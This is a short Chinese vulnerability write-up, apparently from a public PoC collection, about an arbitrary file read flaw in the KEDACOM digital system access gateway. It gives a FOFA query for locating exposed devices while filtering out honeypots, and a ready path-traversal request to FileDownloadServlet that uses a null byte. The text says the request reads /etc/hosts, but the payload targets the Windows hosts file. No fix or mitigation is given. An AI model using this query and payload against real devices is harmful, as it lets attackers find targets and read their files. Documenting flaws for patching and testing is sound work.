# KEDACOM 数字系统接入网关 任意文件读取漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

KEDACOM 数字系统接入网关 存在任意文件读取漏洞，攻击者通过构造请求可以读取服务器任意文件

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

KEDACOM 数字系统接入网关

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

(app="KEDACOM-DVR接入网关") && (is\_honeypot=false && is\_fraud=false)

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-MhqzpI2VW1ya113h5FO%2Fimage.png?alt=media\&token=386912fc-377f-42b3-8657-39344e6a6d6b)

使用POC读取 /etc/hosts

```
/gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqyJJ9XxS7ijApYFN8%2F-Mhqzt2kBBMU64AXmMqv%2Fimage.png?alt=media\&token=48ce5693-e92a-4638-86d7-6f2bfc744432)